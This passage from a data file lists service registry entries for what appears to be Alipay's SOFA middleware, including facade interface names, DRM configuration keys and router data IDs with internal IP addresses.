STANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.battle.downgradableVisitMentalData,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recadmin.common.service.facade.AntFeatureLibDataMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskmngComplainContentConsultCallBack:1.0:mcommentRisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.auth.AuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.riskdatacenter.facade.capacityprod.regression.LoadRegressionImmunityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.biz.service.impl.drm.CacheTrigger.buildNewsTags,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_MPROMO_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:testresaopclient@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.config.UserValidateConfigDrm.identityCheckWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.153.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dms.common.service.LogCallbackService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.mosn.service.facade.gateway.MosnGatewayAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paychecker.common.service.sharedsdk.service.dynamic.DynamicRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.air.service.facade.RecService:1.0:cardRecServiceDebug@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@imasp#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.wall.common.service.InsContinuousOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acprodapicore.facade.manageapi.InvokerManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.resourceCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pcardsales:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.185.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.hypTair.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.admin.TaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.api.IfxUiApprovalDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.zhx.facade.ZHXInsureOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.service.integration.zcbprod.PlanAssetQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.125.236#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mmtcafts@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:fppolicymng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.video.api.YoukuVideoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.L2MainTransactionStatsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.userpsycore.common.service.facade.api.FinUserCompositeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbuservice.common.service.facade.MenuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imkteye.common.service.facade.api.funnel.FunnelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.service.facade.idc.IdentificationStateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.bkgwlite.common.service.facade.spi.TransReceiveService:1.0:bkmerchantprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.product.spi.ValidateProductBuildService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.task.CommonTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fporgassetdecision.common.service.facade.api.ConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.55.114.224#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mcardcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.cashier.common.service.facade.api.RefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmpservice.common.service.facade.tag.DatasourceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bigfish:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vouchercore.facade.api.preferential.PreferentialAmountQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.antha.AnthaLatestMobileInfoDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:stockassetcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antscanGIYHU5BSMQWTC5LVPJRW2LK7NFXHA5LUL5RWQYLSONSXILLEHFZTO3DZMF2Q----antend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zmcustbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_OFFLINE1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ngfe.crowd.jvm.GrpcCrowdMetaClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-lilywhite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.findecision.core.notify.NotifyConfig.newIvrServiceSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.product.query.FpGoldQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.proposal.MobileClientProposalQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloancore.common.service.facade.bill.api.LcRepayPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.common.service.facade.api.UnifiedDetectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.refreshAll,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.prepaidcard.api.PctransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdatafront.common.service.facade.commonquery.CommonQueryService:1.0:ssdcc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:fincontentweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fortunecust.service.facade.equity.EquityRegistrationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.load.DataLoadDriver:1.0:ireserveDataLoadDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.mng.feature.facade.DataStateService:1.0:mybank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:punishcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.ResourceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.aldata.common.service.facade.api.CacheDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.loadTestSampleBizProducts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.graycore.changesdk.server.ChangeDataCollectService:1.0:graycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:trade.product.gsProduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.tag.UserTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.23.240.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finbatch:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.routeClient:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.dailyHost,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.ebpp.ProductConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exriskcenter.common.service.facade.api.mng.TransactionLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.core.config.drm.MftransInterestQueryDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_EMCPLAN#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.HKCampMngServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexTradeBatchVerifyFacadeTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.RopTaskOperateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.inspect.detecttask.DetectOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","pcreditbatch@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.clearingcenter.shareClearingDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbdecisioncenter.common.service.facade.goal.GoalQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.recalNumPerTable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zdal.ldc.tair.poscoreTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.spi.ParmMntListUpdateBaseSpi:1.0:masterdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1103_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinquotationprod.common.service.falcon.facade.api.RanklistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.workbench.WorkBenchBizTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fppolicygw.facade.common.facade.FppolicygwClientResultListener:1.0:agdswindspeed@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmobile.common.service.facade.claim.InsurePlatformClaimServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cryptprod.common.service.facade.HsmRsaCryptoFacade:1.0:fccryptprod_boss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinstockprod.biz.service.gw.trade.api.TradeManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.eworkcard.EntEmployeeOperatorLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.26.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.escapeSchemeChecks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antsycm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cryptprod.common.service.facade.HsmPinCryptoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.biz.auth.exchange.manager.AuthTokenExchangeManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.common.service.facade.api.StaffFacade:1.0:orgStaffFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobileufs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.125.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassistantcore.common.service.facade.rec.api.AssistantRecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.AssetRateSentenceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.processmngTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.amlcloud.common.service.facade.api.AmlAnalyzeService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","charityprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.bluearmyprod:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxagg.common.service.facade.api.management.card.AggCardMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.common.retrytask.spi.RetryTaskExecuteSPI:1.0:acuirecenter-acquirecenterTimeoutExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_DEDUCT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.alipay.test.demo.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.biz.service.sofarest.IaasConnSofaRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.195.203#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.145.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.settlequery.common.service.facade.dback.api.DepositBackInstReturnQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.backmanagement.ActivityManagementUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoevent.common.service.facade.service.EveTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcoop.common.service.facade.UnionCardUserInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gclearingcenter.facade.api.GclearingUniformServiceV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tiyubiz.facade.lottery.BackstageLotteryActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.punish.PunishQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.LogTransferFacade:1.0:zmarLogTransferFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insdataprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acwareslifecore.common.service.facade.InstanceTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apyunqing.facade.ProdVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.tag.TagMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cstraining.common.service.facade.examination.api.CstExaminationQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:caprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:voucherprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.accm.facade.AccmActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.appointment.AppointmentOperationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkbcs.common.service.facade.account.api.AccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.commom.manage.facade.rule.api.PointRuleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zqualitywalleetoe@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.232.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.jiuzhou.facade.hechuan.MsgbrokerServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.biscenter.uem.common.service.facade.process.UEMProcessDefinitionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.RepositoryManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.crmhome.common.service.facade.api.org.InternalStaffQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.role.RoleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.240.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echannelcenter.common.service.facade.mng.EchannelProcessChoreographMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alisis.core.service.compass.ServerCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rdf.gray.config.facade.service.RdfGrayConfigQueryService:1.0:finfundcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.data.DataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.antfin.arc.job.processor.core.service.mng.TenantManagement:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.smartsql.service.facade.service.InstanceServerV2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mshopprod.common.service.allin.facade.KbPriceApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.237.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.messagefusion.facade.api.AppSubscribeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpoperationplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianquery.common.service.api.InsClaimQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.WTConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbitemprod.biz.service.webspi.controller.KbItemQueryWrapperService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.deepinsight.facade.PaymentTaskManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.ForceRepayDrm.unsetForceRepayRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.displayAllowWithdrawYebcore,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.26.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antinvest.api.facade.HsFlowTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:APPVERSION@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsecu.common.service.facade.api.portfolio.AdminPortfolioFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.FintradeOrderRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.146.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acmcscore.facade.OverviewFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.query.PaymentQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.repository.ProductIconRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.isuperman.common.service.facade.api.WorkFlowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bluearmyprod:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_CURE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.mrchpromoprod.facade.access.AccessCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zdataquery.common.service.facade.RefundQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.chongzhimobile.client.OfferItemService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finfundcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.accrmcore.common.service.facade.ChannelOperatorFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_169.254.125.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_M_MPA_INTERNAL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.nodejs.ConsumerService:1.0:intellisensetwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.24.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycap:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tairmanager.interfaces.endpoint.facade.rest.openapi.OpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:RainyTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.WebCommonForwardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.sampleBizProducts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.opinioncoreCacheName.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scheduler.idc.cache.refresh#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.89.157.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.19.28.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ecquery.common.service.ledger.SupVoucherSummaryQueryFacade:1.0:supVoucherSummaryQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.apreserve.facade.api.AllocateInstructionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.isvoperation.IsvOperationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.106.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.revcore.common.service.finaccenter.facade.api.CoaTem